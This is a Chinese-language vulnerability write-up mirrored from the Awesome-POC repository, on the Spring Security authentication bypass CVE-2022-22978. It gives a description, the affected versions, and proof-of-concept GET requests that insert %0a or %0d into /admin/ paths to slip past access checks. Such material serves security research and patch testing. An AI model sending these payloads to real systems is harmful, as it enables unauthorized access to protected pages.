admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978.md

45 lines
938 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
## 漏洞描述
VMware Spring Security是美国威睿VMware公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符(**.**)处理不受信任的输入时存在输入验证错误。
参考链接:
- https://xz.aliyun.com/t/11473
## 漏洞影响
```
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
Spring Security 其他低版本同样受影响
```
## 漏洞复现
正常访问/admin/下任何路由均会提示403。
在/admin/下任何路由中,插入`%0a`或者`%0d`,即可绕过验证访问页面。
poc
```
/admin/%0a%0d
```
例如:
```
GET /admin/%0atest HTTP/1.1
```
```
GET /admin/%0dtest HTTP/1.1
```
```
GET /admin/%0a%0d%0dtest HTTP/1.1
```
Reference in New Issue Copy Permalink